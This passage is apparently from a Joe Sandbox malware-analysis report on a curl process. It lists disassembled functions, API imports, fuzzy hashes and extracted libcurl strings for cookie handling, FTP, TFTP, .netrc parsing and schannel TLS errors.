                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$_strdup$FileMove__acrt_iob_func_time64_unlinkcallocfclosefopenfputsqsort
                                • String ID: # Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
                                • API String ID: 2634863294-1951421411
                                • Opcode ID: 0edd43ba71e3869f1d7cee0d06b31e77ed57b81d1f64b35c3b1bbb5e4d254330
                                • Instruction ID: 52d18514f5ba6fc3cc3689385592e009685b9478af6f794b6120fb00e839c935
                                • Opcode Fuzzy Hash: 0edd43ba71e3869f1d7cee0d06b31e77ed57b81d1f64b35c3b1bbb5e4d254330
                                • Instruction Fuzzy Hash: F651E971A046199FDF14AFA4DC59AAEBBB9FF48750F14402AE901E7381DF749C428B90
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089B935
                                • ___from_strstr_to_strchr.LIBCMT ref: 0089B962
                                  • Part of subcall function 00863857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 00863872
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089BC25
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089BD5A
                                Strings
                                • %c%c%c%u%c, xrefs: 0089B98D
                                • Can't resolve proxy host %s:%hu, xrefs: 0089BBCF
                                • Can't resolve new host %s:%hu, xrefs: 0089BCA4
                                • Skip %u.%u.%u.%u for data connection, re-use %s instead, xrefs: 0089BAFB
                                • Weirdly formatted EPSV reply, xrefs: 0089BA0D
                                • %u,%u,%u,%u,%u,%u, xrefs: 0089BA7C
                                • Couldn't interpret the 227-response, xrefs: 0089BDA6
                                • Illegal port number in EPSV reply, xrefs: 0089B9C2
                                • %u.%u.%u.%u, xrefs: 0089BB34
                                • Bad PASV/EPSV response: %03d, xrefs: 0089BDB8
                                • Connecting to %s (%s) port %d, xrefs: 0089BD2E
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$___from_strstr_to_strchr__stdio_common_vsscanf
                                • String ID: %c%c%c%u%c$%u,%u,%u,%u,%u,%u$%u.%u.%u.%u$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %u.%u.%u.%u for data connection, re-use %s instead$Weirdly formatted EPSV reply
                                • API String ID: 2616960956-1503635593
                                • Opcode ID: e17f6cbddb68a940fb9bfd30795bd14905e1f0041b2ed14115b9578b2a09f5e8
                                • Instruction ID: 23c02655f811c56ad2b14233d6716742dd3c9c1c944e001203b53788fa80c593
                                • Opcode Fuzzy Hash: e17f6cbddb68a940fb9bfd30795bd14905e1f0041b2ed14115b9578b2a09f5e8
                                • Instruction Fuzzy Hash: 73D1F471A08302AFDB15EF24ED80B6AB7E5FF94314F08492EF559D3291DB34E8048B96
                                APIs
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,008B7A20), ref: 00898C37
                                • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00001000,00000000), ref: 00898C5B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00898D7D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00898E2E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00898F8D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00898FA8
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00898FB1
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00899015
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089904B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$fclosefgetsfopen
                                • String ID: $default$login$macdef$machine$password
                                • API String ID: 1690894011-416575051
                                • Opcode ID: 4ef50a1ed584531cefd6d82ccf31f7906642b694233742d5a95d9ed3f8f4797e
                                • Instruction ID: 0cd7fe50f715635c1357f1e24d75d0eae5d5e8375616efde682715687f07a727
                                • Opcode Fuzzy Hash: 4ef50a1ed584531cefd6d82ccf31f7906642b694233742d5a95d9ed3f8f4797e
                                • Instruction Fuzzy Hash: D5D18231A042AACBDF35AB288C447D9BBB2FB56354F1C40DAD489E3291CFB59DC48B51
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00885157
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088516E
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00881751,?,00000000,?,?,?,00868BF9), ref: 00886D39
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00868BF9), ref: 00886D52
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00868BF9), ref: 00886D69
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00868BF9), ref: 00886D80
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886D97
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886DAE
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886DC5
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886DDC
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886DF3
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E0A
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E21
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E38
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E4F
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E66
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008851A4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008851C2
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00885219
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00885237
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00885255
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00885273
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008852DF
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008852FD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088531B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00885339
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00885356
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00885370
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008853B9
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088542A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00885449
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00885466
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00885483
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008854AD
                                  • Part of subcall function 0087E574: getsockname.WS2_32(?,?,?), ref: 0087E5C6
                                  • Part of subcall function 0087E574: WSAGetLastError.WS2_32(?,?,?), ref: 0087E5D0
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$ErrorLastgetsockname
                                • String ID:
                                • API String ID: 3375700865-0
                                • Opcode ID: 7d069c9dea97947120161512666caeeab13065f5cdd6787dc2d0857a1d8142be
                                • Instruction ID: b5215547c5ec729ddd2715217e182b050d118d5df458419506d31c1625360244
                                • Opcode Fuzzy Hash: 7d069c9dea97947120161512666caeeab13065f5cdd6787dc2d0857a1d8142be
                                • Instruction Fuzzy Hash: C5B11032A04A15DFDB099F24E844B98BBF2FF49311F14817AED499B366DBB52810CF94
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00889633,00000000), ref: 00881F12
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881F31
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881F4E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881F6B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881F88
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881FA5
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00881751,?,00000000,?,?,?,00868BF9), ref: 00886D39
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00868BF9), ref: 00886D52
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00868BF9), ref: 00886D69
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00868BF9), ref: 00886D80
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886D97
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886DAE
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886DC5
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886DDC
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886DF3
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E0A
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E21
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E38
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E4F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881FCD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881FEA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00882007
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00882024
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00882041
                                  • Part of subcall function 0087D126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087D13A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00882066
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088207D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00882094
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008820AB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008820C5
                                  • Part of subcall function 00881DD7: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881DFA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00882102
                                  • Part of subcall function 00886D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E66
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088212A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00882147
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088215F
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: ef4aa351d05466250ed9a95069db60f117c093f0ddac12927112c6489961aee4
                                • Instruction ID: 8bc68571ba1ae79b1d5e0c59c70d5d714021c392295fc4d5258953774da92612
                                • Opcode Fuzzy Hash: ef4aa351d05466250ed9a95069db60f117c093f0ddac12927112c6489961aee4
                                • Instruction Fuzzy Hash: EB61B972A10A26EBDB095F34EC4469CFBA6FF49711F14822BD51693362CFB528208FD0
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00897B0C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: %I64d$%s%c%s%c$TFTP buffer too small for options$TFTP file name too long$blksize$netascii$octet$tftp_send_first: internal error$timeout$tsize
                                • API String ID: 1294909896-119092532
                                • Opcode ID: 7d1bb6e665065f872c05e065004a0575418517bdf1f59f3fdba7aff4d3e095fa
                                • Instruction ID: 51d423b8cb42e272d61c86527bf44a360b1a33e8e3cf3dce6524e68b7cbd8a6b
                                • Opcode Fuzzy Hash: 7d1bb6e665065f872c05e065004a0575418517bdf1f59f3fdba7aff4d3e095fa
                                • Instruction Fuzzy Hash: 85B1FF71A086059FDF28EB68CC85FAAB7B5FF46314F0881A8E50DD7391DA30AD45CB94
                                APIs
                                  • Part of subcall function 0088720A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00881751,?,00000000,?,?,?,00868BF9), ref: 0088724B
                                  • Part of subcall function 0088720A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00868BF9), ref: 00887261
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A5531
                                • CertFreeCertificateContext.CRYPT32(00000000), ref: 008A5587
                                Strings
                                • schannel: failed to retrieve ALPN result, xrefs: 008A5316
                                • /1.1, xrefs: 008A535B
                                • http, xrefs: 008A5352
                                • schannel: failed to setup replay detection, xrefs: 008A5289
                                • schannel: failed to setup confidentiality, xrefs: 008A529D
                                • ALPN: server did not agree on a protocol. Uses default., xrefs: 008A5377
                                • schannel: failed to setup stream orientation, xrefs: 008A52CB
                                • schannel: failed to setup memory allocation, xrefs: 008A52B4
                                • schannel: failed to setup sequence detection, xrefs: 008A5275
                                • ALPN: server accepted %.*s, xrefs: 008A5335
                                • schannel: failed to store credential handle, xrefs: 008A5490
                                • schannel: failed to retrieve remote cert context, xrefs: 008A55B3
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$CertCertificateContextFreecalloc
                                • String ID: /1.1$ALPN: server accepted %.*s$ALPN: server did not agree on a protocol. Uses default.$http$schannel: failed to retrieve ALPN result$schannel: failed to retrieve remote cert context$schannel: failed to setup confidentiality$schannel: failed to setup memory allocation$schannel: failed to setup replay detection$schannel: failed to setup sequence detection$schannel: failed to setup stream orientation$schannel: failed to store credential handle
                                • API String ID: 219865100-3105508259
                                • Opcode ID: 60c795a2e4edb12987a876c324e2eca58382f1b45cf1bf4e0d9b571c632a273e
                                • Instruction ID: 00054dd1cb19082afc85aa04e7e7fc2c5922adb23fb88256992835fe2243a84e
                                • Opcode Fuzzy Hash: 60c795a2e4edb12987a876c324e2eca58382f1b45cf1bf4e0d9b571c632a273e
                                • Instruction Fuzzy Hash: 90B1F271A04A189FEF289B14C885BE9B7F4FF4A314F144199E508EB682DB74ADC1CF91
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0086F866
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 0086F87A
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0086F886
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0086F9A0
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 0086F9AF
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0086F9BB
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0086FA09
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 0086FA18
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0086FA24
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0086FA39
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 0086FA48
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0086FA54
                                  • Part of subcall function 00863857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 00863872
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errno$strtoul$__stdio_common_vsscanf
                                • String ID: %c-%c%c$0Lu@Ru@/Mu
                                • API String ID: 3842623485-2714145814
                                • Opcode ID: 435382de80455a51f6fe9fe85d8abbc4ecc54a528573d47af91f839f32efdcd7
                                • Instruction ID: 4ba4089ad5234cb99d5f768f0f96f4aee359f0d7e64732f3c7c62e23fe2b6b8d
                                • Opcode Fuzzy Hash: 435382de80455a51f6fe9fe85d8abbc4ecc54a528573d47af91f839f32efdcd7
                                • Instruction Fuzzy Hash: 4EB1DD74A002199FCB10CFA8E894AADBBB5FF49308F2A81B9DA45DB342D731DD41CB50
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008ACB20
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008ACB42
                                • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008ACB9C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AD01D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AD033
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$callocmallocrealloc
                                • String ID: $ $ $ $ $ $.$.$:
                                • API String ID: 4199894680-3908554926
                                • Opcode ID: 475c9758a9dce6b488582b444d4b562a46041dd4013ae0a1b2e4cfc54111d1a6
                                • Instruction ID: e6b9fd6ee528b32ed1b1dd9bec9c28fada440a6379d1b778a87651756cd2ff29
                                • Opcode Fuzzy Hash: 475c9758a9dce6b488582b444d4b562a46041dd4013ae0a1b2e4cfc54111d1a6
                                • Instruction Fuzzy Hash: 2C719B31601B169FF728DF29C648725BBE2FB4A324F188119D416C7EA1D776F840CB95
                                Strings
                                • GSSAPI handshake failure (invalid security layer), xrefs: 008AFF18
                                • GSSAPI handshake failure (invalid security data), xrefs: 008AFED3
                                • GSSAPI handshake failure (empty security message), xrefs: 008B0193
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID:
                                • String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                • API String ID: 0-3320144510
                                • Opcode ID: 40163ab729514d16a25c558400d1e328a56522d5759a1fc8631c90c4fd27feae
                                • Instruction ID: 8470ca8d9f4281acafca1206fdfd2b537bdc9424f9a890326c17b14c2fdbf3e6
                                • Opcode Fuzzy Hash: 40163ab729514d16a25c558400d1e328a56522d5759a1fc8631c90c4fd27feae
                                • Instruction Fuzzy Hash: 55C11271A04619DFDB14CFA8EC44AADBBF5FF09310F24812AE905E7352DB75A9058F90
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A4BCA
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A4BFE
                                • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A4C39
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A4CD0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,00000000,?,00000000,00000000,?,?,?), ref: 008A4DDA
                                  • Part of subcall function 0087DB77: recv.WS2_32(?,?,?,00000000), ref: 0087DB81
                                  • Part of subcall function 0087DB77: WSAGetLastError.WS2_32(?,?,?,00000000), ref: 0087DB8E
                                Strings
                                • schannel: unable to allocate memory, xrefs: 008A5122
                                • schannel: failed to receive handshake, SSL/TLS connection failed, xrefs: 008A4F1B
                                • SSL: public key does not match pinned public key, xrefs: 008A50BE
                                • schannel: unable to re-allocate memory, xrefs: 008A4C41
                                • schannel: next InitializeSecurityContext failed: %s, xrefs: 008A4FA8, 008A4FF8
                                • schannel: %s, xrefs: 008A4FC7
                                • schannel: failed to send next handshake data: sent %zd of %lu bytes, xrefs: 008A501F
                                • schannel: SNI or certificate check failed: %s, xrefs: 008A4FE9
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: malloc$ErrorLastfreereallocrecv
                                • String ID: SSL: public key does not match pinned public key$schannel: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                                • API String ID: 3337821324-3713536417
                                • Opcode ID: db99b97452462db1956fcd2bb052649018e90f5ac9022eebb40a6c38323dca2d
                                • Instruction ID: f164aaa367ad25ce110af3006bc03d8b88846821183839bf9d58ce0a997987e2
                                • Opcode Fuzzy Hash: db99b97452462db1956fcd2bb052649018e90f5ac9022eebb40a6c38323dca2d
                                • Instruction Fuzzy Hash: 9DF13970A006199FEF288F28C885BE9B7B5FF89314F1491AAE40DD7655DB749E80CF81
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 0088EEE5
                                Strings
                                • Resolve address '%s' found illegal, xrefs: 0088F105
                                • (non-permanent), xrefs: 0088F05C
                                • %255[^:]:%d, xrefs: 0088ED98
                                • RESOLVE %s:%d is wildcard, enabling wildcard checks, xrefs: 0088F0AA
                                • Couldn't parse CURLOPT_RESOLVE removal entry '%s', xrefs: 0088EDAD
                                • *, xrefs: 0088F08B
                                • RESOLVE %s:%d is - old addresses discarded, xrefs: 0088EFEE
                                • Added %s:%d:%s to DNS cache%s, xrefs: 0088F07D
                                • +, xrefs: 0088F055
                                • Couldn't parse CURLOPT_RESOLVE entry '%s', xrefs: 0088F121
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchr
